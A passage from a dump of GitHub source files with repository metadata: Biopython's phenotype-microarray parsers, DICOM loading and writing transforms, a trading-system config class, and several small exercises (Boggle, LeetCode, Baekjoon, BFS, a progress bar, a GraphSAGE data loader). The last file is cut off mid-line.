function_map[sigmoid_func]\n try:\n (self.plateau, self.slope, self.lag, self.v, self.y0), pcov = fit(\n func, self.get_times(), self.get_signals()\n )\n\n self.model = sigmoid_func\n return\n except RuntimeError:\n continue\n raise RuntimeError(\"Could not fit any sigmoid function\")\n\n\ndef JsonIterator(handle):\n \"\"\"Iterate over PM json records as PlateRecord objects.\n\n Arguments:\n - handle - input file\n\n \"\"\"\n try:\n data = json.load(handle)\n except ValueError:\n raise ValueError(\"Could not parse JSON file\")\n\n # We can have one single plate or several\n # we need to discriminate\n if hasattr(data, \"keys\"):\n data = [data]\n\n for pobj in data:\n try:\n plateID = pobj[_csvData][_plate]\n except TypeError:\n raise TypeError(\"Malformed JSON input\")\n except KeyError:\n raise KeyError(\"Could not retrieve plate id\")\n\n # Parse also non-standard plate IDs\n if not plateID.startswith(_platesPrefix) and not plateID.startswith(\n _platesPrefixMammalian\n ):\n warnings.warn(\n f\"Non-standard plate ID found ({plateID})\", BiopythonParserWarning\n )\n else:\n # Simplify the plates IDs, removing letters, as opm does\n if plateID.startswith(_platesPrefixMammalian):\n pID = plateID[len(_platesPrefixMammalian) :]\n else:\n pID = plateID[len(_platesPrefix) :]\n while len(pID) > 0:\n try:\n int(pID)\n break\n except ValueError:\n pID = pID[:-1]\n\n # No luck\n if len(pID) == 0:\n warnings.warn(\n f\"Non-standard plate ID found ({plateID})\", BiopythonParserWarning\n )\n elif int(pID) < 0:\n warnings.warn(\n f\"Non-standard plate ID found ({plateID}), using {_platesPrefix}{abs(int(pID))}\"\n )\n plateID = _platesPrefix + str(abs(int(pID)))\n else:\n if plateID.startswith(_platesPrefixMammalian):\n plateID = _platesPrefixMammalian + \"%02d\" % int(pID)\n else:\n plateID = _platesPrefix + \"%02d\" % int(pID)\n\n try:\n times = pobj[_measurements][_hour]\n except KeyError:\n raise KeyError(\"Could not retrieve the time points\")\n\n plate = PlateRecord(plateID)\n\n for k in pobj[_measurements]:\n # Skip the time points\n if k == _hour:\n continue\n\n plate[k] = WellRecord(\n k,\n plate=plate,\n signals={\n times[i]: pobj[_measurements][k][i] for i in range(len(times))\n },\n )\n\n # Remove the measurements and assign the other qualifiers\n del pobj[\"measurements\"]\n plate.qualifiers = pobj\n\n yield plate\n\n\ndef CsvIterator(handle):\n \"\"\"Iterate over PM csv records as PlateRecord objects.\n\n Arguments:\n - handle - input file\n\n \"\"\"\n plate = None\n data = False\n qualifiers = {}\n idx = {}\n wells = {}\n\n tblreader = csv.reader(handle, delimiter=\",\", quotechar='\"')\n for line in tblreader:\n if len(line) < 2:\n continue\n\n elif _datafile in line[0].strip():\n # Do we have a previous plate?\n if plate is not None:\n qualifiers[_csvData][_datafile] = line[1].strip()\n plate = PlateRecord(plate.id)\n for k, v in wells.items():\n plate[k] = WellRecord(k, plate, v)\n plate.qualifiers = qualifiers\n yield plate\n plate = PlateRecord(None)\n data = False\n qualifiers[_csvData] = {}\n idx = {}\n wells = {}\n\n elif _plate in line[0].strip():\n plateID = line[1].strip()\n\n qualifiers[_csvData][_plate] = plateID\n\n # Parse also non-standard plate IDs\n if not plateID.startswith(_platesPrefix) and not plateID.startswith(\n _platesPrefixMammalian\n ):\n warnings.warn(\n f\"Non-standard plate ID found ({plateID})\", BiopythonParserWarning\n )\n else:\n # Simplify the plates IDs, removing letters, as opm does\n if plateID.startswith(_platesPrefixMammalian):\n pID = plateID[len(_platesPrefixMammalian) :]\n else:\n pID = plateID[len(_platesPrefix) :]\n while len(pID) > 0:\n try:\n int(pID)\n break\n except ValueError:\n pID = pID[:-1]\n\n # No luck\n if len(pID) == 0:\n warnings.warn(\n f\"Non-standard plate ID found ({plateID})\",\n BiopythonParserWarning,\n )\n elif int(pID) < 0:\n warnings.warn(\n f\"Non-standard plate ID found ({plateID}), using {_platesPrefix}{abs(int(pID))}\"\n )\n plateID = _platesPrefix + str(abs(int(pID)))\n else:\n if plateID.startswith(_platesPrefixMammalian):\n plateID = _platesPrefixMammalian + \"%02d\" % int(pID)\n else:\n plateID = _platesPrefix + \"%02d\" % int(pID)\n\n plate.id = plateID\n\n elif _strainType in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_strainType] = line[1].strip()\n\n elif _sample in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_sample] = line[1].strip()\n\n elif _strainNumber in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_strainNumber] = line[1].strip()\n\n elif _strainName in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_strainName] = line[1].strip()\n\n elif _other in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_other] = line[1].strip()\n\n elif _file in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_file] = line[1].strip()\n\n elif _position in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_position] = line[1].strip()\n\n elif _setupTime in line[0].strip():\n if plate is None:\n continue\n qualifiers[_csvData][_setupTime] = line[1].strip()\n\n elif _hour in line[0].strip():\n if plate is None:\n continue\n data = True\n for i in range(1, len(line)):\n x = line[i]\n if x == \"\":\n continue\n wells[x.strip()] = {}\n idx[i] = x.strip()\n\n elif data:\n if plate is None:\n continue\n\n # Workaround for bad-formatted files\n try:\n float(line[0])\n except ValueError:\n continue\n\n time = float(line[0])\n\n for i in range(1, len(line)):\n x = line[i]\n\n try:\n signal = float(x)\n except ValueError:\n continue\n\n well = idx[i]\n wells[well][time] = signal\n\n if plate is not None and plate.id is not None:\n plate = PlateRecord(plate.id)\n for k, v in wells.items():\n plate[k] = WellRecord(k, plate, v)\n plate.qualifiers = qualifiers\n yield plate\n\n\ndef _toOPM(plate):\n \"\"\"Transform a PlateRecord object into a dictionary (PRIVATE).\"\"\"\n d = dict(plate.qualifiers.items())\n\n d[_csvData] = {}\n d[_csvData][_plate] = plate.id\n d[_measurements] = {}\n d[_measurements][_hour] = []\n times = set()\n for wid, w in plate._wells.items():\n d[_measurements][wid] = []\n for hour in w._signals:\n times.add(hour)\n\n for hour in sorted(times):\n d[_measurements][_hour].append(hour)\n for wid, w in plate._wells.items():\n if hour in w._signals:\n d[_measurements][wid].append(w[hour])\n # This shouldn't happen\n else:\n d[_measurements][wid].append(float(\"nan\"))\n\n return d\n\n\nclass JsonWriter:\n \"\"\"Class to write PM Json format files.\"\"\"\n\n def __init__(self, plates):\n \"\"\"Initialize the class.\"\"\"\n self.plates = plates\n\n def write(self, handle):\n \"\"\"Write this instance's plates to a file handle.\"\"\"\n out = []\n for plate in self.plates:\n try:\n out.append(_toOPM(plate))\n except ValueError:\n raise ValueError(\"Could not export plate(s) in JSON format\")\n\n handle.write(json.dumps(out) + \"\\n\")\n\n return len(out)\n\n\nif __name__ == \"__main__\":\n from Bio._utils import run_doctest\n\n run_doctest(verbose=0)\n","repo_name":"biopython/biopython","sub_path":"Bio/phenotype/phen_micro.py","file_name":"phen_micro.py","file_ext":"py","file_size_in_byte":36557,"program_lang":"python","lang":"en","doc_type":"code","stars":3852,"dataset":"github-code","pt":"77"} +{"seq_id":"28118122853","text":"import os\nfrom pathlib import Path\n\nimport numpy as np\nimport pydicom\nimport torch\nfrom monai.transforms import (\n InvertibleTransform,\n MapTransform,\n TraceableTransform,\n Transform,\n)\nfrom monai.utils import ensure_tuple, ensure_tuple_rep\nfrom pydicom import dcmread\nfrom pydicom.dataset import Dataset, FileDataset\nfrom pydicom.multival import MultiValue\nfrom pydicom.uid import ImplicitVRLittleEndian\nfrom pydicom.valuerep import PersonName\n\n\nclass Renamed(MapTransform, InvertibleTransform, TraceableTransform):\n \"\"\"This transform changes the name of the key in a dictionary dataset.\n Careful: rename each key separately.\n \"\"\"\n\n def __init__(self, keys, src_key, dst_key, allow_missing_keys):\n super().__init__(keys, allow_missing_keys)\n self.keys = keys\n self.dst_key = dst_key\n self.src_key = src_key\n\n def __call__(self, data):\n d = dict(data)\n keys = d.keys()\n if self.src_key in keys:\n element = d[self.src_key]\n d.pop(self.src_key)\n d[self.dst_key] = element\n return d\n\nclass PopKeyd(MapTransform, InvertibleTransform, TraceableTransform):\n \"\"\"This transform deletes the name of a key in a dictionary dataset.\n Careful: rename each key separately.\n \"\"\"\n\n def __init__(self, keys, src_key, allow_missing_keys):\n super().__init__(keys, allow_missing_keys)\n self.keys = keys\n self.src_key = src_key\n\n def __call__(self, data):\n d = dict(data)\n keys = d.keys()\n if self.src_key in keys:\n d.pop(self.src_key)\n return d\n\n\nclass Write_dicom(Transform):\n \"\"\"\n This transforms writes and saves arrays to DICOM format.\n \"\"\"\n\n def __init__(self, save: bool, save_location: str = None):\n self.save = save\n\n def __call__(self, array, as_dicom, save_location):\n meta = pydicom.dcmread(as_dicom)\n array = (array * 255**2).astype(np.uint16)\n ## Creating the header information\n file_meta = Dataset()\n file_meta.TransferSyntaxUID = ImplicitVRLittleEndian\n file_meta.MediaStorageSOPClassUID = meta.file_meta.MediaStorageSOPClassUID\n file_meta.MediaStorageSOPInstanceUID = meta.file_meta.MediaStorageSOPInstanceUID\n file_meta.ImplementationClassUID = meta.file_meta.ImplementationClassUID\n\n ## Creating the UID information in the metadata\n ds = FileDataset(save_location, {}, file_meta=file_meta, preamble=b\"\\0\" * 128)\n ds.Modality = meta.Modality\n ds.ContentDate = meta.ContentDate\n ds.ContentTime = meta.ContentTime\n ds.StudyInstanceUID = meta.StudyInstanceUID\n ds.SeriesInstanceUID = meta.SeriesInstanceUID\n ds.SOPInstanceUID = meta.SOPInstanceUID\n ds.SOPClassUID = meta.SOPClassUID\n\n ## These are the necessary imaging components of the FileDataset object.\n ds.SamplesPerPixel = meta.SamplesPerPixel\n ds.PhotometricInterpretation = meta.PhotometricInterpretation\n ds.PixelRepresentation = meta.PixelRepresentation\n ds.BitsStored = array[0][0].nbytes * 8\n ds.BitsAllocated = array[0][0].nbytes * 8\n ds.SmallestImagePixelValue = array.min().tobytes()\n ds.LargestImagePixelValue = array.max().tobytes()\n ds.Columns = array.shape[0]\n ds.Rows = array.shape[1]\n ds.PixelSpacing = meta.PixelSpacing\n\n ## Creating some necessary metadata keys for future transforms such as Cropd\n ds.RescaleSlope = meta.RescaleSlope\n ds.ImageOrientationPatient = meta.ImageOrientationPatient\n ds.ImagePositionPatient = meta.ImagePositionPatient\n ds.RescaleIntercept = meta.RescaleIntercept\n\n ## Saving the pixel data\n ds.PixelData = array.tobytes()\n\n if self.save:\n pydicom.dcmwrite(save_location, dataset=ds, write_like_original=False)\n return ds\n return ds\n\n\nclass LoadDicom(Transform):\n \"\"\"\n Load dicom file or files from provided path.\n\n \"\"\"\n\n def __init__(self, image_only: bool = False, dtype=\"float32\") -> None:\n \"\"\"\n Args:\n\n image_only: if True return only the image volume, otherwise return image data array and header dict.\n dtype: if not None convert the loaded image to this data type.\n\n Note:\n\n - The transform returns an image data array if `image_only` is True,\n or a tuple of two elements containing the data array, and the meta data in a dictionary format otherwise.\n\n \"\"\"\n\n self.image_only = image_only\n self.dtype = dtype\n\n def read(self, files):\n \"open data and load it, careful can be a list of dicoms (directory)\"\n if isinstance(files, list):\n files = [filepath for filepath in files if filepath.is_file()]\n\n elif files.is_dir():\n files = [\n sub_filepath\n for sub_filepath in Path(files).glob(\"**/*\")\n if sub_filepath.is_file()\n ]\n\n if not isinstance(files, list):\n files = [files]\n meta = []\n data = []\n for filepath in files:\n img = pydicom.dcmread(filepath)\n data.append(img)\n meta_data = pydicom.dcmread(filepath, stop_before_pixels=True)\n meta.append(meta_data)\n return data, meta\n\n def dictify(self, meta, remove_overlay_data=True):\n\n \"\"\"\n Turns a pydicom Dataset into a dict with keys derived from the Element tags.\n\n Parameters\n ----------\n meta : pydicom.dataset.Dataset\n The Dataset to dictify\n remove_overlay_data : boolean\n Whether to remove the Overlay Data\n\n Returns\n -------\n output : dict\n \"\"\"\n output = dict()\n for elem in meta:\n if not isinstance(elem.value, MultiValue):\n if not isinstance(elem.value, PersonName):\n if elem.VR != \"SQ\":\n output[elem.name] = elem.value\n else:\n output[elem.name] = [self.dictify(item) for item in elem]\n if remove_overlay_data:\n if \"Overlay Data\" in output:\n del output[\"Overlay Data\"]\n return output\n\n def affine2d(self, data):\n \"\"\"\n Returns the affine matrix of a given Dicom. For now it only works for 2D slices.\n The formula for 3D inputs can be found here: https://nipy.org/nibabel/dicom/dicom_orientation.html .\n \"\"\"\n F11, F21, F31 = data[0].ImageOrientationPatient[3:]\n F12, F22, F32 = data[0].ImageOrientationPatient[:3]\n\n dr, dc = data[0].PixelSpacing\n Sx, Sy, Sz = data[0].ImagePositionPatient\n\n return np.array(\n [\n [F11 * dr, F12 * dc, 0, Sx],\n [F21 * dr, F22 * dc, 0, Sy],\n [F31 * dr, F32 * dc, 0, Sz],\n [0, 0, 0, 1],\n ]\n )\n\n def get_data(self, data, meta):\n \"\"\"\n Gets img array and meta_data.\n For nows, we can't use self.dictify because when we create batches we need to have the exact same keys in the meta_dict.\n For my data, it is not the case if we use dictify because of the differences within the train dataset.\n For very regular data that has the exact same header/meta_data, you can uncomment the corresponding line and comment the\n lines between the stars.\n \"\"\"\n\n pix = [0.5, 0.5]\n shape = data[0].pixel_array.shape\n affine = self.affine2d(meta)\n\n # --------uncomment for dictify--------\n # meta_data = self.dictify(meta[0], remove_overlay_data=True)\n # -------------------------------------\n\n # adding the pixel spacing, array shape and affine\n\n # *******\n meta_data = dict()\n meta_data[\"Rescale Slope\"] = float(meta[0][\"RescaleSlope\"].value)\n meta_data[\"Image Orientation Patient\"] = data[0].ImageOrientationPatient\n meta_data[\"Image Position Patient\"] = data[0].ImagePositionPatient\n meta_data[\"Rescale Intercept\"] = float(meta[0][\"RescaleIntercept\"].value)\n # *******\n\n meta_data[\"Pixel Spacing\"] = pix\n meta_data[\"Data Shape\"] = shape\n meta_data[\"Affine\"] = affine\n\n scaled = []\n\n for k in range(len(data)):\n\n slope = float(meta[k][\"RescaleSlope\"].value)\n intercept = float(meta[k][\"RescaleIntercept\"].value)\n scaled_data = data[k].pixel_array * slope + intercept\n scaled.append(scaled_data)\n\n if len(data) > 1:\n output = np.stack(scaled)\n else:\n output = scaled_data\n\n return output, meta_data\n\n def __call__(self, filename):\n \"\"\"\n Load Dicom file and meta data from the given filename(s).\n\n Args:\n filename: path file or file-like object or a list of files.\n will save the filename to meta_data with key `filename_or_obj`.\n if provided a list of files, use the filename of first file to save,\n and will stack them together as multi-channels data.\n if provided directory path instead of file path, will treat it as\n DICOM images series and read.\n \"\"\"\n img, meta = self.read(filename)\n img_array, meta_data = self.get_data(img, meta)\n img_array = img_array.astype(self.dtype, copy=False)\n\n if self.image_only:\n return img_array\n meta_data[\n \"filename_or_obj\"\n ] = f\"{ensure_tuple(filename)[0]}\" # Path obj should be strings for data loader\n\n return img_array, meta_data\n\n\nclass LoadDicomd(MapTransform):\n \"\"\"\n Dictionary-based wrapper of LoadDicom,\n It can load both image data and metadata. When loading a list of files in one key,\n the arrays will be stacked and a new dimension will be added as the first dimension\n In this case, the meta data of the first image will be used to represent the stacked result.\n The affine transform of all the stacked images should be same.\n The output metadata field will be created as ``meta_keys`` or ``key_{meta_key_postfix}``.\n\n \"\"\"\n\n def __init__(\n self,\n keys,\n dtype=np.float32,\n meta_keys=None,\n meta_key_postfix: str = \"meta_dict\",\n overwriting: bool = False,\n image_only: bool = False,\n allow_missing_keys: bool = False,\n ) -> None:\n \"\"\"\n Args:\n keys: keys of the corresponding items to be transformed.\n See also: :py:class:`monai.transforms.compose.MapTransform`\n dtype: if not None convert the loaded image data to this data type.\n meta_keys: explicitly indicate the key to store the corresponding meta data dictionary.\n the meta data is a dictionary object which contains: filename, original_shape, etc.\n it can be a sequence of string, map to the `keys`.\n if None, will try to construct meta_keys by `key_{meta_key_postfix}`.\n meta_key_postfix: if meta_keys is None, use `key_{postfix}` to store the metadata of the nifti image,\n default is `meta_dict`. The meta data is a dictionary object.\n For example, load nifti file for `image`, store the metadata into `image_meta_dict`.\n overwriting: whether allow to overwrite existing meta data of same key.\n default is False, which will raise exception if encountering existing key.\n image_only: if True return dictionary containing just only the image volumes, otherwise return\n dictionary containing image data array and header dict per input key.\n allow_missing_keys: don't raise exception if key is missing.\n \"\"\"\n super().__init__(keys, allow_missing_keys)\n self._loader = LoadDicom(image_only, dtype)\n if not isinstance(meta_key_postfix, str):\n raise TypeError(\n f\"meta_key_postfix must be a str but is {type(meta_key_postfix).__name__}.\"\n )\n self.meta_keys = (\n ensure_tuple_rep(None, len(self.keys))\n if meta_keys is None\n else ensure_tuple(meta_keys)\n )\n if len(self.keys) != len(self.meta_keys):\n raise ValueError(\"meta_keys should have the same length as keys.\")\n self.meta_key_postfix = ensure_tuple_rep(meta_key_postfix, len(self.keys))\n self.overwriting = overwriting\n\n def __call__(self, data):\n \"\"\"\n Raises:\n KeyError: When not ``self.overwriting`` and key already exists in ``data``.\n\n \"\"\"\n d = dict(data)\n for key, meta_key, meta_key_postfix in self.key_iterator(\n d, self.meta_keys, self.meta_key_postfix\n ):\n data = self._loader(d[key])\n if self._loader.image_only:\n if not isinstance(data, np.ndarray):\n raise ValueError(\n \"loader must return a numpy array (because image_only=True was used).\"\n )\n d[key] = data\n else:\n if not isinstance(data, (tuple, list)):\n raise ValueError(\n \"loader must return a tuple or list (because image_only=False was used).\"\n )\n d[key] = data[0]\n if not isinstance(data[1], dict):\n raise ValueError(\"metadata must be a dict.\")\n meta_key = meta_key or f\"{key}_{meta_key_postfix}\"\n if meta_key in d and not self.overwriting:\n raise KeyError(\n f\"Meta data with key {meta_key} already exists and overwriting=False.\"\n )\n d[meta_key] = data[1]\n return d\n","repo_name":"Ghitahouir/med_seg","sub_path":"utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":13894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6574733305","text":"from dataclasses import dataclass\nfrom typing import List, Tuple, Type\n\nfrom melo_fwk.basket.product_basket import ProductBasket\nfrom melo_fwk.basket.strat_basket import StratBasket\nfrom mql.mconfig.common_melo_config import CommonMeloConfig\nfrom mql.mconfig.mql_dict import MqlDict\nfrom mql.mconfig.estimator_config import EstimatorConfigBuilder\nfrom melo_fwk.estimators.pf_allocation_estimator import PFAllocationEstimator\nfrom melo_fwk.market_data.base_market_loader import BaseMarketLoader\nfrom melo_fwk.pfio.base_portfolio_mgr import BasePortfolioManager\nfrom melo_fwk.pose_size import BaseSizePolicy\nfrom melo_fwk.trading_systems import TradingSystem\nfrom melo_fwk.trading_systems.base_trading_system import BaseTradingSystem\nfrom melo_fwk.basket.weights import Weights\n\n@dataclass(frozen=True)\nclass MeloBooksConfig(CommonMeloConfig):\n\tcluster_names: List[str]\n\tproduct_baskets: List[ProductBasket]\n\tstrats_list: List[StratBasket]\n\tpose_size_list: List[BaseSizePolicy]\n\tweights: Weights\n\ttime_period: List[int]\n\testimator_config_: Tuple[Type[PFAllocationEstimator], dict]\n\n\tdef __post_init__(self):\n\t\tassert len(self.product_baskets) == len(self.strats_list), \\\n\t\t\tf\"len product != strat ({len(self.product_baskets)} != {len(self.strats_list)})\"\n\t\tassert len(self.product_baskets) == len(self.pose_size_list), \\\n\t\t\tf\"len product != size_policy ({len(self.product_baskets)} != {len(self.pose_size_list)})\"\n\n\tdef build_trading_systems(self) -> List[BaseTradingSystem]:\n\t\treturn [\n\t\t\tTradingSystem(\n\t\t\t\tname=name,\n\t\t\t\tproduct_basket=p_basket,\n\t\t\t\tstrat_basket=s_basket,\n\t\t\t\tsize_policy=size_policy)\n\t\t\tfor name, p_basket, s_basket, size_policy in zip(\n\t\t\t\tself.cluster_names, self.product_baskets, self.strats_list, self.pose_size_list)\n\t\t]\n\n\t@staticmethod\n\tdef build_config(pf_mgr: BasePortfolioManager, market_db: BaseMarketLoader, quant_query: dict):\n\t\ttime_period, clusters, weights = MeloBooksConfig.load_clusters(pf_mgr, market_db, quant_query)\n\t\treturn MeloBooksConfig(\n\t\t\tname=quant_query.strip_single(\"QueryName\"),\n\t\t\tcluster_names=[c.name for c in clusters],\n\t\t\tproduct_baskets=[c.product_basket for c in clusters],\n\t\t\tstrats_list=[c.strat_basket for c in clusters],\n\t\t\tpose_size_list=[c.size_policy for c in clusters],\n\t\t\treporter_class_=EstimatorConfigBuilder.get_reporter(quant_query),\n\t\t\testimator_config_=EstimatorConfigBuilder.build_estimator(quant_query),\n\t\t\ttime_period=time_period,\n\t\t\tweights=weights,\n\t\t)\n\n\t@staticmethod\n\tdef load_clusters(\n\t\tpf_mgr: BasePortfolioManager,\n\t\tmarket_db: BaseMarketLoader,\n\t\tquant_query: dict\n\t) -> Tuple[List[int], List[BaseTradingSystem], Weights]:\n\n\t\tmql_dict = MqlDict(quant_query)\n\t\tclusters_mql_dict = mql_dict.get_node(\"Clusters\")\n\t\tclusters_name = clusters_mql_dict.parse_list(\"AlphanumList\")\n\t\tclusters_weights = clusters_mql_dict.parse_num_list(\"WeightsList\")\n\t\tclusters_divmult = float(mql_dict.get_node(\"DivMult\"))\n\t\ttime_period_mql_dict = clusters_mql_dict.get_node(\"TimePeriod\")\n\t\ttime_period = time_period_mql_dict.parse_num_list(\"timeperiod\", default=[0, 0], type_=int)\n\n\t\tweights = Weights(\n\t\t\tweights=clusters_weights,\n\t\t\tdivmult=clusters_divmult\n\t\t)\n\n\t\tclusters = [\n\t\t\tpf_mgr.load_portfolio_config(market_db, c_name)\n\t\t\tfor c_name in clusters_name\n\t\t]\n\t\treturn time_period, clusters, weights\n\n\tdef build_clusters_estimator(self):\n\t\treturn self.estimator_config_[0](\n\t\t\testimator_params=self.estimator_config_[1],\n\t\t\ttime_period=self.time_period,\n\t\t\ttrading_syst_list=self.build_trading_systems(),\n\t\t\tweights=self.weights,\n\t\t)\n","repo_name":"omarboukhris/melo-fwk","sub_path":"mql/mconfig/melo_books_config.py","file_name":"melo_books_config.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5322713105","text":"# DO NOT MODIFY THIS FILE.\n\nfrom boggle import Boggle\nfrom hash_map import HashMap\nfrom numpy import loadtxt\nimport sys\n\n# The default name of the dictionary file.\ndictionary_file_name = 'dictionary.txt'\n\n# The default seed for randomization value.\nseed_for_randomization = 100\n\n# If the command line argument count is greater than one.\nif len(sys.argv) > 1:\n # Set the seed for randomization value from the first command line argument.\n seed_for_randomization = int(sys.argv[1])\n\n# Set the initial number of buckets in the hash map.\ninitial_number_of_buckets = 16\n\n# Create and load the words array with word strings from the dictionary file.\nwords_array = loadtxt(dictionary_file_name, dtype='str')\n\n# Initialize a hash map to store the dictionary words.\ndictionary_hash_map = HashMap(initial_number_of_buckets)\n\n# For each word in the words array, add it to the dictionary hash map.\nfor word in words_array:\n dictionary_hash_map.add(word.upper())\n\n# Initialize our Boggle instance\nboggle = Boggle(seed_for_randomization, dictionary_hash_map)\n\n# Print the board.\nboggle.print_board()\n\n# Find all words\nfound_words_lists = boggle.find_all_words()\n\n# Print the list of found words.\nprint(found_words_lists)\n\n# Calculate the total points.\ntotal_points = boggle.count_points(found_words_lists)\n\nprint(f\"Total Points: {total_points}\")\n","repo_name":"DavidBalash/csc420-project","sub_path":"one_player_boggle.py","file_name":"one_player_boggle.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28749366329","text":"from typing import List\n\n# Time: O(m*n)\n# Space: O(1)\nclass Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n strs.sort(key=len)\n\n result = \"\"\n initial_word = strs[0]\n\n\n for index in range(len(initial_word)): # O(m)\n for word in strs[1:]: # O(n-1)\n if initial_word[index] != word[index]:\n return result\n result += initial_word[index]\n \n return result\n\n\nleet_Code = Solution()\nresult_1 = leet_Code.longestCommonPrefix([\"flower\",\"flow\",\"flight\"])\nresult_2 = leet_Code.longestCommonPrefix([\"dog\",\"racecar\",\"car\"])\n\nprint(result_1)\nprint(result_2)","repo_name":"marcocaldera/leet-code","sub_path":"easy/longestCommonPrefix.py","file_name":"longestCommonPrefix.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1152094006","text":"import sys\nsys.stdin = open(\"input.txt\", 'r')\ninput = sys.stdin.readline\n\nS = input().rstrip()\nl = []\nc = {'P':13, 'K':13, 'H':13, 'T':13}\nfor i in range(0, len(S), 3):\n l.append(S[i:i+3])\n\nfor v in l:\n c[v[0]] -= 1\n\nif len(set(l)) != len(l):\n print('GRESKA')\nelse:\n print(c['P'], c['K'], c['H'], c['T'])","repo_name":"hjyoon/baekjoon-answers","sub_path":"_11000/11507.py","file_name":"11507.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1996299504","text":"import time\nimport sys\nfrom tqdm import tqdm\n\ndef progressbar(desc:str,i, total_len,len_pbar=20):\n s = \"[\" + \"#\" * int(i * len_pbar / total_len) + \" \" * (len_pbar - int(i * len_pbar / total_len)) + \"]\"\n s = \"\\r%s %s:%.2f%%\"%(desc,s,1.0*i / total_len*100)\n # print(s,end=\"\",flush=True,file=open(\"123.txt\",'w'))\n print(s,end=\"\",flush=True)\n # sys.stdout.write(s)\n # return s\n\nclass Progressbar:\n def __init__(self,pbar,total_len=None):\n self.pbar = iter(pbar)\n self.idx = 0\n self.total_len = len(pbar) if total_len is None else total_len\n\n def __iter__(self):\n while True:\n yield next(self.pbar)\n self.idx += 1\n if self.idx >= self.total_len:break\n\n def set_description(self,desc):\n progressbar(desc,self.idx+1,self.total_len)\n\nif __name__ == \"__main__\":\n # fp = open(\"123.txt\", 'w')\n # for i in range(300):\n # time.sleep(0.01)\n # progressbar(\"\",i+1,300)\n # print(i, flush=True, file=fp)\n # fp.close()\n pbar = Progressbar(enumerate(range(300)),300)\n for i,j in pbar:\n time.sleep(0.01)\n pbar.set_description(str(i)+\"进度条\")","repo_name":"wucng/toolcv","sub_path":"toolcv/tools/pbar.py","file_name":"pbar.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"13774445559","text":"from collections import defaultdict\r\n\r\n\r\nclass Graph:\r\n\r\n def __init__(self):\r\n # default dict to store a graph\r\n self.graph = defaultdict(list)\r\n\r\n # function to add an edge to the graph\r\n def addEdge(self, u, v):\r\n self.graph[u].append(v)\r\n\r\n def BFS(self, source):\r\n # mark al vertices as not visited\r\n visited = [False] * (max(self.graph) + 1)\r\n\r\n # create a queue for BFS\r\n queue = [source]\r\n\r\n # mark source node as visited\r\n visited[source] = True\r\n\r\n while queue:\r\n # dequeue a vertex from queue and print it\r\n source = queue.pop(0)\r\n print(source, end=\" \")\r\n\r\n # Get all adjacent vertices of the\r\n # dequeued vertex s. If a adjacent\r\n # has not been visited, then mark it\r\n # visited and enqueue it\r\n for i in self.graph[source]:\r\n if not visited[i]:\r\n queue.append(i)\r\n visited[i] = True\r\n\r\n\r\n# Driver code\r\n\r\n# Create a graph given in\r\n# the above diagram\r\ng = Graph()\r\ng.addEdge(0, 1)\r\ng.addEdge(0, 2)\r\ng.addEdge(1, 2)\r\ng.addEdge(2, 0)\r\ng.addEdge(2, 3)\r\ng.addEdge(3, 3)\r\n\r\nprint(\"Following is Breadth First Traversal\"\r\n \" (starting from vertex 2)\")\r\ng.BFS(1)\r\n","repo_name":"kbikeguy/mycodes","sub_path":"Python/bfs_practice/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16568024076","text":"from sklearn.model_selection import StratifiedShuffleSplit\nfrom torch import zeros_like, manual_seed\nfrom torch_geometric.datasets import Planetoid, WebKB\n\nmanual_seed(7)\n\ndef stratified_split(data, labels, train_split: float = 0.9):\n splitter = StratifiedShuffleSplit(n_splits=1, train_size=train_split, random_state=7)\n for train, test in splitter.split(data, labels):\n train = train\n test = test\n return train, test\n\ndef get_dataset(name:str, root:str, train_split:float = None):\n if name == \"cora\":\n dataset = Planetoid(root=root, name=name)\n elif name == \"wisconsin\":\n dataset = WebKB(root=root, name=name)\n else:\n print(\"Invalid dataset!\")\n exit(1)\n data = dataset[0]\n # In case multiple train-val-test splits are provided.\n if len(data.train_mask.size()) != 1:\n data.train_mask = data.train_mask[:, 0]\n data.val_mask = data.val_mask[:, 0]\n data.test_mask = data.test_mask[:, 0]\n\n if train_split != 1.0:\n train_indices, __ = stratified_split(\n data=data.train_mask.nonzero().flatten(),\n labels=data.y[data.train_mask],\n train_split=train_split,\n )\n train_mask = zeros_like(data.val_mask)\n train_mask[train_indices] = True\n data.train_mask = train_mask\n return data\n","repo_name":"Samidha09/COL870","sub_path":"Assignment_2/node-classification/src/graphsage/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"74211640248","text":"#bruteforce Algorithm\nimport sys\ninput = sys.stdin.readline\nn, m, b = map(int, input().split())\nground = [list(map(int, input().split())) for _ in range(n)]\nhighest = max(max(ground))\nlowest = min(min(ground))\n\ntime = int(1e9)\nheight = 0\n\nfor h in range(lowest, highest+1):\n use = 0\n get = 0\n \n for i in range(n):\n for j in range(m):\n if ground[i][j] > h:\n get += (ground[i][j] - h)\n else:\n use += (h - ground[i][j])\n if b + get < use:\n continue\n needTime = use + get*2\n if time >= needTime:\n time = needTime\n height = h\nprint(time, 